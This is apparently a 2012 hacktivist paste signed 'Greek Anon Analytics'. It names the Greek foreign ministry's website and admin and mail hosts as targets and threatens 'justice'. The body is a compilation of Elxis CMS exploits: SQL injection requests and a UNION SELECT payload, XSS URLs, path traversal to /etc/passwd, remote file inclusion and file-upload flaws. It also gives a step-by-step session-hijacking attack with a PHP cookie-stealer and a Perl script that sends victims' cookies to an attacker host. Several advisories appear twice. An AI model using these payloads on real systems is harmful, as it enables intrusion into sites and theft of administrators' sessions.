Don't like ads? PRO users don't see any ads ;-)
Guest

ANON GREEK ANALYTICS DAY II (WE ANALYSE)

By: a guest on Jul 25th, 2012  |  syntax: None  |  size: 111.59 KB  |  hits: 859  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. -----------------------------------GREEK ANON ANALYTICS-----------------------------------------------
  2.  
  3. THIS WEBSITE COST TO GREEK PEOPLE 1.2million euros  IT IS THE FOREIGN AFFAIRES WEBSITE
  4. SITE IS BUILT WITH  ELXIS CMS (FREE)http://www.elxis.org/
  5. ELXIS CMS IS POWERFULL BUT IT HAS SOME ISSUES BECAUSE IT IS FREE
  6. **WE THING THAT WITH 1.2 MILLION YOU COULD DO SOMETHING BETTER ,A CUSTOM PLATFORM THAN A FREE ONE***
  7. BUT SAME SHIT DIFFERENT DAY***
  8. IN ORDER TO PROTECT WHAT THEY CANT PROTECT WE WILL NOT PUBLISH VULNERABLE LINKS WE FOUND
  9. ON THE ANATOMY OF THEIR PLATFORM.
  10. NOTE THAT THIS SITE IS VULNERABLE TO SQLI AND XSS and MORE............................
  11. BUT WE MUST PROVE THAT THIS SITE DOES NOT WORTH 1.2MILLION SO...
  12. EXPECT JUSTICE
  13.  
  14. -----------------------------------GREEK ANON ANALYTICS-----------------------------------------------
  15.  
  16.  
  17. www.mfa.gr/administrator
  18. mail.mfa.gr
  19.  
  20.  
  21. *******************************************************************************************************
  22. **********************************---***elxis vulnerabilities***---*************************************
  23. Vulnerability ID: HTB22700
  24. Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
  25. Product: Elxis CMS
  26. Vendor: Elxis Team ( http://www.elxis.org/ )
  27. Vulnerable Version: 2009.2 electra
  28. Vendor Notification: 16 November 2010
  29. Vulnerability Type: SQL Injection
  30. Status: Fixed by Vendor
  31. Risk level: High
  32. Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
  33.  
  34. Vulnerability Details:
  35. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
  36. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  37.  
  38. The following PoC is available:
  39.  
  40.  
  41. GET /index.php HTTP/1.1
  42. Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
  43.  
  44.  
  45. *******Solution: Upgrade to the most recent version***************************************************
  46.  
  47. Vulnerability Details:
  48. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
  49. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  50.  
  51. The following PoC is available:
  52.  
  53.  
  54. POST /index.php?option=com_poll&Itemid=17 HTTP/1.1
  55. X_FORWARDED_FOR: 123'SQL_CODE_HERE
  56. Content-Type: application/x-www-form-urlencoded
  57. Content-Length: 66
  58.  
  59. voteid=1&option=com_poll&task=vote&id=1&Itemid=17&task_button=Vote
  60.  
  61. *****Solution: Upgrade to the most recent version
  62. *****************************************************************************************************
  63. *************************************XSS VULN********************************************************
  64. ********************http://blip.tv/mrpr0n/elxis-2009-3-aphrodite-rev2681-session-hijacking-5490513****
  65. *******************************************************************************************************
  66. Elxis CMS Cross-site scripting (XSS)
  67.  
  68. Vendor's description of software and download:
  69. # http://www.elxis.org
  70.  
  71. Dork:
  72. # N/a
  73.  
  74. Application Info:
  75. # elxis 2009.3 aphrodite / february 2012
  76.  
  77. Vulnerability Info:
  78. # Type: XSS
  79.  
  80. Time Table:
  81. # 13/02/2012 - Vendor notified
  82.  
  83. XSS:
  84. #Input passed to the "i" parameter in /includes/simplepie/handler_image.php is not properly sanitised before being returned to the user.
  85.  
  86. Solution:
  87. # Input validation of vulnerable parameters should be corrected.
  88.  
  89. POC:
  90.  
  91. http://www.elxis-demo.com/includes/simplepie/handler_image.php?i=db222055fb39%3CsCrIpT%3Ealert%281234%29%3C%2fsCrIpT%3E
  92.  
  93. Credit:
  94. # Discoverd By: Maciej Gojny / Ariko-Security 2012
  95. 1) Input passed to the "task" parameter in index.php (when "option" is set to "com_content") is not properly
  96. sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a
  97. user's browser session in context of an affected site.
  98. 2) Input passed via the URL to administrator/index.php is not properly sanitised before being returned to the user.
  99. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected
  100. site.
  101. ============================
  102. | 0×01 | XSS Vulnerabilites                   |
  103. =============================
  104.  
  105. FrontPage Manager: (com_content)
  106.  
  107. 1       http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_frontpage&task=&boxchecked=0&simpleview=1
  108.  
  109. Content Items Manager: (com_frontpage)
  110.  
  111. 1       http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_pub=-3&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_content&sectionid=0&task=&boxchecked=0&hidemainmenu=0&redirect=0&simpleview=1
  112.  
  113. Private Messages: (com_messages)
  114.  
  115. 1       http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&limit=20&limitstart=0&option=com_messages&task=&boxchecked=0&hidemainmenu=0
  116.  
  117. Menus Manager: (com_menus)
  118.  
  119. 1       http://VICTIM_SERVER/elxis/administrator/index2.php?levellimit=1&search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&order%5B%5D=1&access=29&order%5B%5D=1&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=5&access=29&order%5B%5D=5&access=29&order%5B%5D=7&access=29&order%5B%5D=7&access=29&order%5B%5D=9&access=29&order%5B%5D=10&access=29&order%5B%5D=10&access=29&order%5B%5D=12&access=29&order%5B%5D=12&access=29&limit=20&limitstart=0&option=com_menus&menutype=mainmenu&task=&boxchecked=0&hidemainmenu=0
  120.  
  121. =========================================
  122. | 0×02 | Session hijacking Vulnerability                         |
  123. =========================================
  124. Intro…
  125. The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
  126.  
  127. Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.
  128.  
  129. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
  130.  
  131. The session token could be compromised in different ways; the most common are:
  132.  
  133.     Predictable session token;
  134.     Session Sniffing;
  135.     Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
  136.     Man-in-the-middle attack
  137.     Man-in-the-browser attack
  138.  
  139. Source:
  140. https://www.owasp.org/index.php/Session_hijacking_attack
  141.  
  142. The 1st Step:
  143. Upload to the ATTACKER_SERVER:
  144.  
  145.     stealer.php – [Record the cookies of every user that views it!]
  146.     gotit.txt – [The log file!]
  147.  
  148. 1       //--- stealer.php ---
  149. 2       <?php
  150. 3       header ('Location:http://VICTIM_SERVER/elxis/administrator/index2.php');
  151. 4       $cookie = $_GET['cookie'];
  152. 5       $log = fopen("gotit.txt", "a");
  153. 6       fwrite($log, $cookie ."\n");
  154. 7       fclose($log);
  155. 8       ?>
  156. 9       //--- end ---
  157.  
  158. The 2nd Step:
  159.  
  160. Create the “evil” link (with the Elxis_2009.3_Aphrodite_rev2681.pl).
  161.  
  162. 01      # --- Elxis_2009.3_Aphrodite_rev2681.pl ---
  163. 02      #!/usr/bin/perl
  164. 03      print "\n   |==[ mr.pr0n ]=============================================== |\n";
  165. 04      print "   | Elxis 2009.3 Aphrodite rev2681 - ..the evil link creator    |\n";
  166. 05      print "   |===================[ http://ghostinthelab.wordpress.com/ ]== |\n";
  167. 06       
  168. 07      print "\nEnter the target (e.g.: http://victim.com)";
  169. 08      print "\n> ";
  170. 09      $target=;
  171. 10      chomp($target);
  172. 11      $target = "http://".$target if ($target !~ /^http:/);
  173. 12       
  174. 13      print "Enter the elxis directory (e.g.: elxis)";
  175. 14      print "\n> ";
  176. 15      $dir=;
  177. 16      chomp($dir);
  178. 17       
  179. 18      $target = $target."/".$dir;
  180. 19       
  181. 20      print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/directory/stealer.php)";
  182. 21      print "\n> ";
  183. 22      $stealer=;
  184. 23      chomp($stealer);
  185. 24       
  186. 25      $result = "document.location=\"$stealer?cookie=\"+document.cookie\;";
  187. 26      $result =~ s/(.)/sprintf("%x%",ord($1))/eg;
  188. 27       
  189. 28      print "\n[+] Send this link to your victim...\n\n";
  190. 29      print $target."/administrator/index2.php?option=com_frontpage&search='\">%".$result."3b\n";
  191. 30      #--- end ---
  192.  
  193. The 3rd Step:
  194. Send the “evil” link to the administrator….
  195. WARNING : The administrator *MUST* be logged in.
  196.  
  197. The 4th Step:
  198.  
  199. Go to http://VICTIM_SERVER/elxis/administrator/
  200. Insert into your cookie the hijacked session.
  201. Go to http://VICTIM_SERVER/elxis/administrator/index2.php
  202. …..Welcome administrator :-)
  203. *****************************************************************************************************
  204. *****************************************************************************************************
  205. ########################################################################
  206. #Elxis CMS Local File Disclosure Vulnerability
  207. #Script Site      :  http://www.elxis.org
  208. ########################################################################
  209. #
  210. #Code : <?php
  211. #
  212. # line 639  Header("Content-Type: ".$this->contentType."; charset=".$this->encoding);
  213. # line 640  Header("Content-Disposition: inline; filename=".basename($filename));
  214. # line 641  readfile($filename, "r");
  215. # line 642  die();
  216. #       ?>
  217. #PoC  :  http://[target]/[path]/includes/feedcreator.class.php?filename=../../../../../../etc/passwd
  218. #
  219. #
  220. #
  221. ########################################################################
  222. ########################################################################
  223. ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
  224. ########################################################################
  225. ########################################################################
  226.  
  227. ?
  228.  
  229.        
  230. Vulnerability ID: HTB22700
  231. Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
  232. Product: Elxis CMS
  233. Vendor: Elxis Team ( http://www.elxis.org/ )
  234. Vulnerable Version: 2009.2 electra
  235. Vendor Notification: 16 November 2010
  236. Vulnerability Type: SQL Injection
  237. Status: Fixed by Vendor
  238. Risk level: High
  239. Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
  240.  
  241. Vulnerability Details:
  242. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
  243. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  244.  
  245. The following PoC is available:
  246.  
  247.  
  248. GET /index.php HTTP/1.1
  249. Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
  250.  
  251.  
  252. Solution: Upgrade to the most recent version
  253.  
  254. Vulnerability Details:
  255. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
  256. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  257.  
  258. The following PoC is available:
  259.  
  260.  
  261. POST /index.php?option=com_poll&amp;Itemid=17 HTTP/1.1
  262. X_FORWARDED_FOR: 123'SQL_CODE_HERE
  263. Content-Type: application/x-www-form-urlencoded
  264. Content-Length: 66
  265.  
  266. voteid=1&amp;option=com_poll&amp;task=vote&amp;id=1&amp;Itemid=17&amp;task_button=Vote
  267.  
  268. Solution: Upgrade to the most recent version
  269.  
  270. Elxis CMS 2009.2 suffers from a remote SQL injection vulnerability.
  271. High-Tech Bridge ./Elxis CMS 2009.2 SQL Injection Vulnerabilities ( php)
  272. ?
  273.  
  274.        
  275. Vulnerability ID: HTB22700
  276. Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
  277. Product: Elxis CMS
  278. Vendor: Elxis Team ( http://www.elxis.org/ )
  279. Vulnerable Version: 2009.2 electra
  280. Vendor Notification: 16 November 2010
  281. Vulnerability Type: SQL Injection
  282. Status: Fixed by Vendor
  283. Risk level: High
  284. Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
  285.  
  286. Vulnerability Details:
  287. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
  288. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  289.  
  290. The following PoC is available:
  291.  
  292.  
  293. GET /index.php HTTP/1.1
  294. Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
  295.  
  296.  
  297. Solution: Upgrade to the most recent version
  298.  
  299. Vulnerability Details:
  300. The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
  301. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  302.  
  303. The following PoC is available:
  304.  
  305.  
  306. POST /index.php?option=com_poll&Itemid=17 HTTP/1.1
  307. X_FORWARDED_FOR: 123'SQL_CODE_HERE
  308. Content-Type: application/x-www-form-urlencoded
  309. Content-Length: 66
  310.  
  311. voteid=1&option=com_poll&task=vote&id=1&Itemid=17&task_button=Vote
  312.  
  313. Solution: Upgrade to the most recent version
  314.  
  315. n0n0x/Elxis CMS 2009.2 Remote File Inclusion ( na)
  316. ?
  317.  
  318.        
  319. ###############################################
  320. #          _______         _______            #
  321. #  _______ __  __ \_______ __  __ \____  __   #
  322. #  __  _  \_  / / /__  __ \_  / / /__  |/_/   #
  323. #  _  / / // /_/ / _  / / // /_/ / __>  <     #
  324. #  /_/ /_/ \____/  /_/ /_/ \____/  /_/|_|     #
  325. #                                             #
  326. # priasantai.uni.cc    |    team-elite.us     #
  327. ###############################################
  328.  
  329. #######################################################
  330. #
  331. #  elxis_2009.2_electra_rev2631 <=== multiple Remote File Include
  332. #
  333. #######################################################
  334. # Author : n0n0x
  335. #
  336. # Homepage: http://priasantai.uni.cc/
  337. #
  338. # Download script : http://www.elxis-downloads.com/downloads/elxis-cms/272.html
  339. #######################################################
  340.  
  341. file : index.php
  342.  
  343. http://site.com/elxis-cms/index.php?mosConfig_absolute_path=[shell script]
  344.  
  345.  
  346. c0de :
  347.  
  348. require_once('configuration.php');
  349. if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
  350.     if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
  351.     if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
  352.     include($mosConfig_absolute_path.'/includes/systemplates/router.php');
  353.     exit();
  354. }
  355.  
  356. require_once($mosConfig_absolute_path.'/includes/Core/loader.php');
  357.  
  358.  
  359. file : index2.php
  360.  
  361. http://site.com/elxis-cms/index2.php?mosConfig_absolute_path=[shell script]
  362.  
  363. c0de :
  364.  
  365. require_once('configuration.php');
  366. $mosConfig_gzip = '0'; //gzip makes seo title suggestion feature to stop working
  367. if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
  368.     if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
  369.     if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
  370.     include($mosConfig_absolute_path.'/includes/systemplates/router.php');
  371.     exit();
  372. }
  373.  
  374. require_once( $mosConfig_absolute_path.'/includes/Core/loader.php' );
  375.  
  376. file : index.php
  377.  
  378. http://site.com/elxis-cms/administrator/index.php?str_replace=[shell script]
  379.  
  380. c0de :
  381.  
  382. /** Set flag that this is a parent file */
  383. define( '_VALID_MOS', 1 );
  384. define( '_ELXIS_ADMIN', 1 );
  385.  
  386.  
  387. $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
  388. require_once($elxis_root.'/includes/Core/security.php');
  389.  
  390. if (!file_exists($elxis_root.'/configuration.php')) {
  391.     header('Location: ../installation/index.php');
  392.     exit();
  393. }
  394.  
  395. require_once($elxis_root.'/configuration.php');
  396. require_once($elxis_root.'/includes/Core/loader.php');
  397.  
  398. file : index2.php
  399.  
  400. http://site.com/elxis-cms/administrator/index2.php?str_replace=[shell script]
  401. http://site.com/elxis-cms/administrator/index2.php?mosConfig_absolute_path=[shell script]
  402.  
  403. c0de :
  404.  
  405. define( '_VALID_MOS', 1 );
  406. define( '_ELXIS_ADMIN', 1 );
  407.  
  408. $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
  409. require_once($elxis_root.'/includes/Core/security.php');
  410.  
  411. if (!file_exists($elxis_root.'/configuration.php' )) {
  412.     header("Location: ../installation/index.php");
  413.     exit();
  414. }
  415.  
  416. require_once($elxis_root.'/configuration.php');
  417. require_once($elxis_root.'/includes/Core/loader.php');
  418. require_once($mosConfig_absolute_path.'/administrator/includes/admin.php');
  419.  
  420.  
  421. #######################################################
  422. # Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org - team-elite.us
  423. #
  424. # friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
  425. #          devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
  426. #
  427. # chats : irc.auzs.net 6667-7000 #exploit-db
  428. ######################################################
  429.  
  430. Elxis CMS version 2009.2 suffers from a remote file inclusion vulnerability.
  431. Ewerson Guimaraes/Elxis CMS 2009.3 Aphrodite Cross Site Scripting ( na)
  432. ?
  433.  
  434.        
  435. [Discussion]
  436.  
  437. - DcLabs Security Research Group advises about the following vulnerability(ies):
  438.  
  439. [Software]
  440.  
  441. - Elxis CMS
  442.  
  443. [Vendor Product Description]
  444.  
  445. - Elxis is powerful open source content management system (CMS)
  446. released for free under the GNU/GPL license. It has unique
  447. multi-lingual features, it follows W3C standards, it is secure,
  448. flexible, easy to use, and modern. The development team, Elxis Team,
  449. paid extra attention to the optimization of the CMS for the search
  450. engines and this lead to high performance of all elxis powered web
  451. sites and to high ranking in search engines results.
  452.  
  453.  
  454. - Site: http://www.elxis.org/
  455.  
  456. [Advisory Timeline]
  457.  
  458. - 11/22/2011 -> First Contact requesting security department contact;
  459. - 11/22/2011 -> Vendor responded;
  460. - 11/23/2011 -> Advisory sent to vendor;
  461. - 11/23/2011 -> Vendor reply, fix the bug, release  patch and
  462. coordinate to publish.
  463. - 12/05/2011 -> Published.
  464.  
  465. [Bug Summary]
  466.  
  467. - Persistent/Stored Cross-Site Scripting (XSS) (The cms admin can edit
  468. user contact info with XSS codes)
  469.  
  470. - Non-Persistent Cross-Site Scripting (XSS)
  471.  
  472. [Impact]
  473.  
  474. - High
  475.  
  476. [Affected Version]
  477.  
  478. - Elxis 2009.3 aphrodite
  479.  
  480.  
  481. [Bug Description and Proof of Concept]
  482.  
  483. - Exploiting the HTML-injection issue allows an attacker to execute
  484. HTML and Java Script code in the remote user context to steal
  485. cookie-based authentication credentials or to control how the site is
  486. rendered to the user; other attacks may also be possible.
  487.  
  488. - Moreover, Cross Site Scripting (XSS) vulnerabilities are caused due
  489. to lack of input validation. This allows malicious people to inject
  490. arbitrary HTML and script code. More info at:
  491. http://en.wikipedia.org/wiki/Cross-site_scripting
  492.  
  493. POC
  494.  
  495. /elxis/index.php?id=3&amp;Itemid=9&amp;option=com_content&amp;task=%22%20onmouseover%3dprompt%28dclabs%29%20dcl%3d%22
  496.  
  497. /elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E
  498.  
  499.  
  500. All flaws described here were discovered and researched by:
  501.  
  502. Ewerson Guimaraes aka Crash
  503. DcLabs Security Research Group
  504. crash (at) dclabs <dot> com <dot> br
  505.  
  506. [Patch(s) / Workaround]
  507.  
  508. http://forum.elxis.org/index.php?PHPSESSID=v9i7kgmmb2554ldmlcmbj32ugjd0ngpc&amp;topic=5144.msg43327#msg43327
  509.  
  510. [Greetz]
  511. DcLabs Security Research Group.
  512.  
  513. --
  514. Ewerson Guimaraes (Crash)
  515. Pentester/Researcher
  516. DcLabs Security Team
  517. www.dclabs.com.br
  518.  
  519. Elxis CMS version 2009.3 Aphrodite suffers from a cross site scripting vulnerability.
  520. Demetris Papapetrou/Elxis CMS eForum 1.1 File Upload ( na)
  521. ?
  522.        
  523. ==========================================================================
  524.    Elxis CMS component eForum v1.1 - Arbitary File Upload Vulnerability
  525. ==========================================================================
  526.  
  527. Software:    eForum v1.1 (Elxis CMS component)
  528. Vendor:      http://www.isopensource.com/
  529. Vuln Type:    Arbitary File Upload
  530. Remote:      Yes
  531. Local:      No
  532. Discovered by:  QSecure and Demetris Papapetrou
  533. Website:    http://www.qsecure.com.cy
  534. Discovered:    09/03/2011
  535. Reported:    06/04/2011
  536. Fixed:      07/04/2011 (eForum v1.1 patched)
  537. Disclosed:    09/04/2011
  538. Vendor's Response: http://forum.elxis.org/index.php?topic=5144.msg39714#msg39714
  539. Vulnerability Reference: http://www.qsecure.com.cy/advisories/arbitary_file_upload_in_elxis_cms_eforum.html
  540.  
  541. VULNERABILITY DESCRIPTION:
  542. ==========================
  543. The script "/eforum.php" is prone to an arbitrary file-upload vulnerability because it fails to properly filter dangerous file extensions.
  544.  
  545. An attacker can exploit this issue to upload an arbitrary remote file (e.g. .phtml) containing malicious PHP code and to execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system.
  546.  
  547.  
  548. VULNERABILITY DETAILS:
  549. ======================
  550.  
  551. Form Details:
  552. --------------
  553. Id:    eforumpostform
  554. Name:  eforumpostform
  555. Method:  POST
  556. Action:  http://host/path_to_elxis_cms/index2.php
  557.  
  558. INDEX  NAME      TYPE    VALUE
  559. 0    title      text    Re:Test Port    
  560. 1    icon      select        
  561. 2    btncolor    select        
  562. 3    message      textarea  test      
  563. 4    notify      checkbox  1      
  564. 5    efattachment[]  file    /tmp/phpinfo.phtml      
  565. 6    eftplurl    hidden    http://host/path_to_elxis_cms/components/com_eforum/template/blue      
  566. 7    option      hidden    com_eforum      
  567. 8    task      hidden    save      
  568. 9    bid        hidden    2      
  569. 10    parent      hidden    5      
  570. 11    id        hidden    0
  571.  
  572.  
  573. Arbitrary File Upload Location:
  574. -------------------------------
  575. http://host/path_to_elxis_cms/components/com_eforum/upload/
  576.  
  577.  
  578. Vulnerable Code:
  579. ----------------
  580. File Location:   /path_to_elxis_cms/components/com_eforum/
  581. File Name:     eforum.php
  582.  
  583. [code]
  584. if (isset($_FILES)) { //upload attachments
  585.   if (isset($_FILES['efattachment']) &amp;&amp; is_array($_FILES['efattachment']) &amp;&amp; isset($_FILES['efattachment']['name']) &amp;&amp; (count($_FILES['efattachment']['name']) > 0)) {
  586.     $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess');   <-- File extensions filter
  587.     $uploaddir = $eforum->path.'/upload';
  588.     $upfiles = $_FILES['efattachment'];
  589.     foreach ($upfiles['name'] as $idx => $upname) {
  590.       if ($upname != '') {
  591.         $source = $upfiles['tmp_name'][$idx];
  592.         if (is_uploaded_file($source)) {
  593.           if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }
  594. [/code]
  595.  
  596. Elxis CMS eForum component version 1.1 suffers from an arbitrary file upload vulnerability.
  597. n0n0x/Elxis CMS 2009.2 Remote file include vulnerbility ( php)
  598. ?
  599.  
  600.        
  601. ###############################################
  602. #          _______         _______            #
  603. #  _______ __  __ \_______ __  __ \____  __   #
  604. #  __  _  \_  / / /__  __ \_  / / /__  |/_/   #
  605. #  _  / / // /_/ / _  / / // /_/ / __>  <     #
  606. #  /_/ /_/ \____/  /_/ /_/ \____/  /_/|_|     #
  607. #                                             #
  608. # priasantai.uni.cc    |    team-elite.us     #
  609. ###############################################
  610.  
  611. #######################################################
  612. #
  613. #  elxis_2009.2_electra_rev2631 <=== multiple Remote File Include
  614. #
  615. #######################################################
  616. # Author : n0n0x
  617. #
  618. # Homepage: http://priasantai.uni.cc/
  619. #
  620. # Download script : http://www.elxis-downloads.com/downloads/elxis-cms/272.html
  621. #######################################################
  622.  
  623. file : index.php
  624.  
  625. http://site.com/elxis-cms/index.php?mosConfig_absolute_path=[shell script]
  626.  
  627.  
  628. c0de :
  629.  
  630. require_once('configuration.php');
  631. if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
  632.     if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
  633.     if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
  634.     include($mosConfig_absolute_path.'/includes/systemplates/router.php');
  635.     exit();
  636. }
  637.  
  638. require_once($mosConfig_absolute_path.'/includes/Core/loader.php');
  639.  
  640.  
  641. file : index2.php
  642.  
  643. http://site.com/elxis-cms/index2.php?mosConfig_absolute_path=[shell script]
  644.  
  645. c0de :
  646.  
  647. require_once('configuration.php');
  648. $mosConfig_gzip = '0'; //gzip makes seo title suggestion feature to stop working
  649. if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
  650.     if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
  651.     if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
  652.     include($mosConfig_absolute_path.'/includes/systemplates/router.php');
  653.     exit();
  654. }
  655.  
  656. require_once( $mosConfig_absolute_path.'/includes/Core/loader.php' );
  657.  
  658. file : index.php
  659.  
  660. http://site.com/elxis-cms/administrator/index.php?str_replace=[shell script]
  661.  
  662. c0de :
  663.  
  664. /** Set flag that this is a parent file */
  665. define( '_VALID_MOS', 1 );
  666. define( '_ELXIS_ADMIN', 1 );
  667.  
  668.  
  669. $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
  670. require_once($elxis_root.'/includes/Core/security.php');
  671.  
  672. if (!file_exists($elxis_root.'/configuration.php')) {
  673.     header('Location: ../installation/index.php');
  674.     exit();
  675. }
  676.  
  677. require_once($elxis_root.'/configuration.php');
  678. require_once($elxis_root.'/includes/Core/loader.php');
  679.  
  680. file : index2.php
  681.  
  682. http://site.com/elxis-cms/administrator/index2.php?str_replace=[shell script]
  683. http://site.com/elxis-cms/administrator/index2.php?mosConfig_absolute_path=[shell script]
  684.  
  685. c0de :
  686.  
  687. define( '_VALID_MOS', 1 );
  688. define( '_ELXIS_ADMIN', 1 );
  689.  
  690. $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
  691. require_once($elxis_root.'/includes/Core/security.php');
  692.  
  693. if (!file_exists($elxis_root.'/configuration.php' )) {
  694.     header("Location: ../installation/index.php");
  695.     exit();
  696. }
  697.  
  698. require_once($elxis_root.'/configuration.php');
  699. require_once($elxis_root.'/includes/Core/loader.php');
  700. require_once($mosConfig_absolute_path.'/administrator/includes/admin.php');
  701.  
  702.  
  703. #######################################################
  704. # Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org - team-elite.us
  705. #
  706. # friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
  707. #          devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
  708. #
  709. # chats : irc.auzs.net 6667-7000 #exploit-db
  710. ######################################################
  711.  
  712. High-Tech Bridge SA/Elxis CMS 2009.2 Electra Rev2631 Cross Site Scripting / SQL Injection ( na)
  713. ?
  714.  
  715.        
  716. ====================================
  717. Vulnerability ID: HTB22613
  718. Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_elxis_cms.html
  719. Product: Elxis CMS
  720. Vendor: Elxis Team ( http://www.elxis.org/ )
  721. Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
  722. Vendor Notification: 20 September 2010
  723. Vulnerability Type: SQL Injection
  724. Status: Fixed by Vendor
  725. Risk level: Low
  726. Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
  727.  
  728. Vulnerability Details:
  729. The vulnerability exists due to failure in the "administrator/components/com_content/admin.content.php" script to properly sanitize user-supplied input in "id" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
  730.  
  731. Attacker can use browser to exploit this vulnerability. The following PoC is available:
  732. http://host/administrator/index2.php?option=com_content&amp;sectionid=0&amp;task=edit&amp;hidemainmenu=1&amp;id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c
  733. Solution: Upgrade to the most recent version
  734.  
  735.  
